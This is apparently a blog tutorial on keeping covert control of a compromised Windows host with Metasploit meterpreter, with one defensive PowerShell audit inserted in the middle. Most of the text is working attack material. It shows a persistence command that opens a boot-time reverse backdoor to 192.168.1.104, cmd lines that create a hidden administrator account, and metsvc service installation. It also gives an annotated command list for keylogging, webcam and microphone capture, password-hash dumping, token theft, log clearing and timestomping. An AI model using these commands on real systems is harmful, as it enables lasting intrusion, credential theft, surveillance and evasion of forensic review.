Once a reverse shell gives you a session, you want persistent control of the target host, so that you do not have to re-run the attack every time to get a meterpreter back.

1. Using the persistence module

The persistence module installs a permanent backdoor on the target machine: even if the target patches the vulnerability one day, we can still control it through this connection.
Common options:
-X start automatically at boot
-i interval in seconds between payload reconnection attempts
-p port for the reverse connection
-r IP address for the reverse connection
Full help for persistence:

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host. 
OPTIONS:
     -A        Automatically start a matching exploit/multi/handler to connect to the agent    
     -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.    
     -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.    
     -S        Automatically start the agent on boot as a service (with SYSTEM privileges)    
     -T <opt>  Alternate executable template to use    
     -U        Automatically start the agent when the User logs on
     -X        Automatically start the agent when the system boots
     -h        This help menu    
     -i <opt>  The interval in seconds between each connection attempt    
     -p <opt>  The port on which the system running Metasploit is listening    
     -r <opt>  The IP of the system running Metasploit listening for the connect back

run persistence -X -i 11 -p 6220 -r 192.168.1.104, then configure the exploit/multi/handler module and start listening.

2. Creating a hidden user on the target host

Get a remote command shell on the target host.
If this fails, the target may restrict access to cmd.exe; use migrate to inject into a process owned by an administrator user and try again.
In cmd, enter the following:

# create the user (the $ suffix hides the created account)
net user test$ 123456 /add
# add the new user to the administrators group
net localgroup administrators test$ /add

3. Using the metsvc service

Running run metsvc registers Meterpreter in the target's service list as a service that starts automatically at boot. Running run metsvc -r removes the Meterpreter service from the target host.
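The three persistence techniques above leave recognisable artefacts on the host. The following PowerShell audit is an added example (not from the original post and not part of Metasploit) that checks for them from the defender's side: autorun entries and services launching from a Temp directory (the -L default is %TEMP%), services whose name or path matches the metsvc/Meterpreter service (an assumed pattern, derived from the description above), and local accounts with a trailing $ that sit in the Administrators group. It assumes Windows PowerShell 5.1+ with the LocalAccounts module and an elevated prompt.

```powershell
# Added example: audit a Windows host for the persistence artefacts described above.
# Assumptions: persistence -X/-U/-S and metsvc launch their payload from %TEMP% or register
# a service, and the hidden account is a local user whose name ends in '$'.
$findings = @()

# 1. Autorun entries (Run/RunOnce for machine and current user) whose command points into a Temp dir
$runKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)
$providerProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($providerProps -contains $p.Name) { continue }   # skip registry provider metadata
        if ([string]$p.Value -match '(?i)\\Temp\\|%TEMP%') {
            $findings += "Autorun '$($p.Name)' in $key launches from Temp: $($p.Value)"
        }
    }
}

# 2. Services whose binary lives in Temp, or whose name/path matches the assumed Meterpreter service pattern
foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $path = [string]$svc.PathName
    if ($path -match '(?i)\\Temp\\') {
        $findings += "Service '$($svc.Name)' runs from Temp: $path"
    }
    if ("$($svc.Name) $($svc.DisplayName) $path" -match '(?i)metsvc|meterpreter') {
        $findings += "Service '$($svc.Name)' matches the Meterpreter service pattern: $path"
    }
}

# 3. Local accounts with a trailing '$' (hidden from 'net user', but still listed by Get-LocalUser)
$admins = Get-LocalGroupMember -Group 'Administrators' | ForEach-Object { $_.Name.Split('\')[-1] }
foreach ($u in (Get-LocalUser | Where-Object { $_.Name.EndsWith('$') })) {
    $role = if ($admins -contains $u.Name) { 'LOCAL ADMIN' } else { 'not admin' }
    $findings += "Local user '$($u.Name)' has a trailing `$ ($role, enabled=$($u.Enabled))"
}

if ($findings.Count -eq 0) { 'No persistence indicators found.' } else { $findings }
```

Run keys and services are only the defaults the option descriptions imply; a payload written with -L to another location, or a renamed service, will not match these patterns.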

meterpreter help output

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session                           # put the current session in the background (interact again later with sessions -i <id>)
    bgkill                    Kills a background meterpreter script                     # kill a background meterpreter script
    bglist                    Lists running background scripts                          # list background scripts
    bgrun                     Executes a meterpreter script as a background thread      # run a script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel                                          # close a channel
    disable_unicode_encoding  Disables encoding of unicode strings                      # disable unicode encoding
    enable_unicode_encoding   Enables encoding of unicode strings                       # enable unicode encoding
    exit                      Terminate the meterpreter session                         # end the meterpreter session, same as quit
    get_timeouts              Get the current session timeout values                    # get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module                  # show information about a post module
    irb                       Drop into irb scripting mode                              # enter Ruby scripting mode
    load                      Load one or more meterpreter extensions                   # load an extension, e.g. load mimikatz to read cleartext passwords from the compromised host instead of running hashdump and cracking offline
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process                     # process migration, used for process injection: with ps, inject into a process running as SYSTEM to go from the administrator account to SYSTEM
    pivot                     Manage pivot listeners
    quit                      Terminate the meterpreter session                         # end/terminate/exit the meterpreter session, same as exit
    read                      Reads data from a channel
    resource                  Run the commands stored in a file                         # run the commands stored in a file
    run                       Executes a meterpreter script or Post module              # run a meterpreter script or post module
    sessions                  Quickly switch to another session                         # sessions
    set_timeouts              Set the current session timeout values                    # set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"                               # load meterpreter extensions; alias for load, now deprecated
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel

Stdapi: File system Commands        # file system commands
============================

# Linux-style file commands typed at the meterpreter prompt act on the compromised host by default (pwd, getwd, ps, cat, ...); only the variants marked with an l (lpwd, getlwd) act on the local Kali machine

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen     # show the contents of a file on the target, e.g. cat c:\\111.txt
    cd            Change directory                              # change the working directory
    checksum      Retrieve the checksum of a file               # get the checksum of a file
    cp            Copy source to destination                    # copy a file to a destination
    dir           List files (alias for ls)
    download      Download a file or directory                  # download a file from the target to the local Kali machine, e.g. download c:\\1111.txt /root
    edit          Edit a file                                   # edit a file on the target with vim, e.g. edit c:\\xxx.txt
    getlwd        Print local working directory                 # print the local Kali working directory (local working directory), same as lpwd
    getwd         Print working directory                       # print the target's working directory, same as pwd
    lcd           Change local working directory                # change the local Kali working directory
    lpwd          Print local working directory                 # print the local Kali working directory (local print working directory), same as getlwd
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory                       # print the target's working directory, same as getwd
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory                    # upload a local file or directory to the target

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces                                                    # show IP addresses
    ipconfig      Display interfaces                                                    # show IP addresses
    netstat       Display the network connections                                       # show network connections
    portfwd       Forward a local port to a remote service                              # port forwarding: e.g. when the target is on an internal network, forward port 3389 directly with this command instead of uploading a separate port-forwarding tool such as nc or lcx
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table                                     # view or modify the target's routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log                                                   # clear the event log on the target
    drop_token    Relinquishes any active impersonation token.                          # drop the token: stop impersonating the current token
    execute       Execute a command                                                     # run a command or file, e.g. execute -f cmd.exe -i runs cmd.exe and interacts with it
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier                                    # show the current process id (pid) on the target, i.e. the pid of the reverse-shell payload
    getprivs      Attempt to enable all privileges available to the current process     # obtain as many privileges as possible
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as                            # show which user the session runs as on the target, same as whoami
    kill          Terminate a process                                                   # kill a process, e.g. kill 123 kills pid 123 (use ps to find the pid)
    localtime     Displays the target system's local date and time                      # local time on the target system
    pgrep         Filter processes by name                                              # process grep: filter processes by name
    pkill         Terminate processes by name                                           # terminate processes by name
    ps            List running processes                                                # process list
    reboot        Reboots the remote computer                                           # reboot the target
    reg           Modify and interact with the remote registry                          # interact with the target's registry: create, delete, query, etc.
    rev2self      Calls RevertToSelf() on the remote machine                            # call RevertToSelf() on the target to return to the user account the session originally ran as
    shell         Drop into a system command shell                                      # drop into the target's system shell, e.g. cmd on Windows, bash on Linux
    shutdown      Shuts down the remote computer                                        # shut down
    steal_token   Attempts to steal an impersonation token from the target process      # steal an impersonation token from a target process running as SYSTEM and impersonate it to elevate to SYSTEM, similar to migrate
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS                  # show the target's system information: computer name, OS, architecture, language, domain, number of logged-on users, and the payload type running on the target

Stdapi: User interface Commands     # user interface commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations                     # list all accessible desktops
    getdesktop     Get the current meterpreter desktop                                  # get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle          # idle time: how long the target user has been idle
    keyscan_dump   Dump the keystroke buffer                                            # dump the keystroke buffer (keylogger log)
    keyscan_start  Start capturing keystrokes                                           # start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes                                            # stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop                         # take a screenshot of the target; the file is saved automatically on the local Kali machine
    setdesktop     Change the meterpreters current desktop                              # switch to another user's desktop (depends on which users are logged on)
    uictl          Control some of the user interface components                        # control/take over the target's keyboard and mouse

Stdapi: Webcam Commands             # webcam commands (note: to watch the target's screen in real time, use run vnc)
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam

Priv: Elevate Commands              # privilege escalation commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.            # attempt to elevate to SYSTEM privileges

Priv: Password database Commands    # password database commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database                                # dump the password hashes from the SAM database (still need to be cracked); the "run hashdump" and "run smart_hashdump" scripts are stealthier

Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes                                       # manipulate a file's MACE attributes, e.g. change its creation time (anti-forensics)

Last modification: August 13th, 2019 at 07:59 pm